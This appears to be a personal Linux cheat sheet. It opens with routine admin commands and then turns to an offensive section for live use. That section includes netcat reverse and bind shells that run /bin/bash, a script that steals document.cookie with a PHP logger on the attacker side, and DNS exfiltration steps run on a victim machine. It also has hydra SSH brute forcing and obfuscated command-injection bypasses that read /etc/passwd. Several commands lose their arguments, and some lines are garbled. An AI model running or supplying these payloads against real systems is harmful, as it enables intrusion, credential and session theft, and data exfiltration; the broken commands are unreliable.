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File metadata and controls

426 lines (412 loc) · 11.3 KB

Linux Commands Guide

System Commands

List number of lines in a file

wc -l filename.txt

List contents of a file

cat filename.txt

Create new folder

mkdir foldername

Delete a file

rm filename

Delete a folder

rm -rf foldername

Delete a protected file

sudo rm filename

Create empty file (1)

touch filename

Create empty file (2)

printf " " > tee filename

Print line with specific word in a file

cat filename | grep -i "word"

Skip lines with specific word and print all else

cat filename | grep -v "word"

Navigate inside a folder

cd foldername

Navigate to home folder


Locate a file path

locate filename

List contents of a folder


List contents of a folder with extra information

ls -l

Navigate to home folder directories from any other folder

cd ~/directory_inside_your_home_folder

Get status of a system service

sudo service service_name status

TRIM the system

sudo fstrim -a -v

Clean APT

sudo apt autoremove && sudo apt clean

Copy a file to folder

sudo cp filename ~/Pictures/foldername

Change ownership of a file

sudo chown username:username filename 

Change ownership of all files in current folder

sudo chown username:username *

Give read/write/execute/change rights to a script

sudo chmod +x scriptname.ext

Run script with default script interpreter


Terminal system resource monitoring


Scan current machine connections, filter for only tcp and udp with https

netstat -a | grep -E "tcp|udp" | grep -i "https"

Scan system ports using tcp and udp

netstat -pn | grep -E "tcp|udp"

Print only proccess id and process name

ps | awk ''{print $1"\t"$4}'

Detailed processes without tl garbage

ps -aux | awk '{print $1"\t"$2"\t"$NF}'

Find system users and app users

awk -F ":" '{print " | "$1" | "$6" | "$7" | "}' /etc/passwd

Find installed shells

awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sort

Default shell history without line numbers

history | awk '{$1=""; sub(" ", " "); print}'

ZSH history without garbage

cat ~/.zsh_history | awk -F ":" '{$1="";$2=""; sub(" ", " "); print}' | awk -F ";" '{$1=""; sub(" ", " "); print}'

Find installed shells

awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sort

One line sys recon

print "\n=== Routing Tables ===\n" && netstat -r && print "\n\n=== Ports Scan ===\n" && netstat -pn | grep -E "tcp|udp" && print "\n\n=== Active Connections ===\n" && netstat -a | grep -E "tcp|udp" | grep -i "https" && print "\n\n=== Active Front Processes ===\n" && ps | awk '{print $1"\t"$4}' && print "\n\n=== Active All Processes ===\n" && ps -aux | awk '{print $1"\t"$2"\t"$NF}' && print "\n\n=== App Users ===\n" && awk -F ":" '{print " | "$1" | "$6" | "$7" | "}' /etc/passwd && print "\n\n=== Installed Shells ===\n" && awk -F "/" '/^\// {print $NF}' /etc/shells | uniq | sort

Get server header and body using Netcat

nc -v 80

Use openssl for https traffic

Regex Commands

Match all line containing a work


Match everything before the word including the word itself

^(.*?WORD) ?

Regex Cheatsheet

Name Symbol Pure Regex
Caret ^ ^
Digit \d [0-9]
Not Digit \D [^\d]
Word \w [a-zA-z0-9]
Not Word \W [^\w]
Whitespace \s [\f\n\r\t\v]
Not Whitespace \S [^\s]

Error Management Commands

APT timezone or cert mismatch error (temporary fix) solution

sudo apt-get -o Acquire::Check-Valid-Until=false -o Acquire::Check-Date=false update

Screen tear solutions

  1. Add the following line



After splash 2. Install Compton compositor

sudo apt -y install compton


xfconf-query -c xfwm4 -p /general/use_compositing -s false

rm -rf ~/.config/xfce4/ && sudo reboot
  1. Goto compositor options of your ‘display settings’ and select ‘no compositor’ or any other option (IF you don't want any compositor!)
  2. ONLY use if driver issues persist - disable nouveau modeset

Inside the line after splash


Restart networking

sudo systemctl restart NetworkManager.service

Name resolution failure solution

  1. Try to restart dnsmasq service: sudo service dnsmasq restart
  2. Create and add google dns in resolver: sudo touch /etc/resolv.conf and add nameserver inside it.
    1. Restart resolv service: sudo systemctl restart systemd-resolved.service && sudo service systemd-resolved status

List network service running on specific port

sudo netstat -ltnp | grep -w ':8080'

List service running on port

lsof -i :8080

List running process by name

ps -fA | grep python

Kill a process using process ID

kill 81211

Kill all specific application name processes

kill -9 $(ps -A | grep python | awk '{print $1}')

Kill all specific application name processes

kill -9 $(ps -A | grep python | awk '{print $1}')

Using Extra Scripts/Tools

List contents of a file, filter by lines with specific word and add inside new file

cat old_file | grep -i "word_to_filter" | anew new_file

Open proxified firefox custom profile

proxychains firefox -p profile_name

Run anything under proxy

proxychains script_name

Clone GitHub repository faster

git clone --depth=1

Open a file inside Sublime Text

subl filename

OpenVPN Connection

sudo openvpn the_ovpn_file.ovpn

SSH Connection

ssh username@servername

Route through an IP

ip route add via

RDP connection


Python simple http server

Start in new terminal!

sudo python -m SimpleHTTPServer 80

Offensive Tool Commands

Find subdomains of a website and save to file

assetfinder | anew filename

Find if subdomains of website are alive or not

cat subdomain_list_file | httprobe | anew probed_urls

Get all current and previous urls of a domain

gau | anew all_urls

Perform request to webshell with command / C&C

curl -X POST -d "_=command"

Inject JS payload inside image

python -i image.bmp "<scRiPt y='><'>/*<sCRipt* */prompt()</script"

Get all parameters in a domain

python3 ~/ParamSpider/ --domain -o ~/WorkingDirectory/website_directory/pspider

SQLMap tampers


Basic XSS url fuzzing

python3 ~/XSStrike/ -u --fuzzer

Clean memory items and cache on run

sudo pandora bomb

Google dorking

godork -q "inurl:search.php=" -p 50 | tee results.txt

Google dorking + proxychains

proxychains godork -q "inurl:search.php=" -p 50 | tee results.txt

Directory bruteforcing

gobuster dir -url | anew dirs && dirb | anew dirs

Using packetwhisper to exfil data using DNS

  1. mkdir tmpwork && cd tmpwork && wget [](
  2. Start python simple http server
  3. Goto victims machine & open outbound port
  4. Generate powershell cmd & start wireshark on attacker machine
  5. On victim machine, execute generated powershell code

Ping sweep

fping -a -g 2> /dev/null

nmap -sn

Find service versions of services on server

sudo nmap -sV -F -sS ip_addr

Netcat bind shell

Attacker machine:

nc -lvp 1337 -e /bin/bash

Victim machine:

nc -v attackerip 1337

JS payload - post to attacker

On victim asset:

<script> var i = new Image(); i.src=""+escape(document.cookie) </script>

On attacker website:

$ip = $_SERVER['REMOTE_ADDR'];  
$browser = $_SERVER['HTTP_USER_AGENT'];  
$fp = fopen('jar.txt', 'a');  
fwrite($fp, $ip.' '.$browser."\n");  
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n\n");  

Bruteforcing SSH using hydra

hydra server_ip_addr ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Password/rockyou-10.txt -f -V

Airodump - Get chaninel specific traffic - filter by enc type

airodump-ng --channel 1 wlan0 / airodump-ng --channel 1 --encrypt WPA1 wlan0

Airodump - Sniff all bands and channels

airodump-ng --band abg wlan0

Airodump - filter by channel / essid

airodump-ng --channel 1,2,3,4 / --essid AP_NAME

Get Original AP / MITM detection (part) by BSSID + ESSID filter

airodump-ng --band abg wlan0 / --essid AP_NAME / --bssid MAC_ADDRESS_OF_ORIGINAL_DEVICE

Command Injection filter bypass - reflected

  1. Using command seperate: ; pwd
  2. Using command append: && cat /etc/passwd
  3. Using pipe: | cat /etc/passwd
  4. Using quoted command - add quotes for any character in word (EX:cat/et"c"/p"a"ssw"d")
  5. Using wildcards - replace any word with "*" & "?" (EX:cat /etc/pa*wd or cat /etc/p?sswd)
  6. Using null vars - add `` in between words (EX:cat /e``tc/p``asswd)
  7. Multi bypass - (EX:|cat /"e"t``c/p?sswd)
  8. Lethal injection 1 - reversed + multi filters (EX:echo "dws?ap/c``t"e"/ tac" | rev | /bin/bash)
  9. Lethal injection 2 - reversed + endeded + multi filters (EX:echo "ZHdzP2FwL2NgYHQiZSIvIHRhYw==" | base64 -d | rev | /bin/bash)

Fuzzing for bypass:

"dws?ap/c``t"e"/ tac" | rev

Command Injection filter bypass - blind

  1. Test reflection On victim asset: | nc ip_addr_attacker port_number

On attacker machine:

nc -lvp port_number
  1. If reflection success, get reverse shell On victim asset: | nc ip_addr_attacker port_number -e /bin/bash

On attacker machine:

python -c "import pty:pty.spawn('/bin/bash')"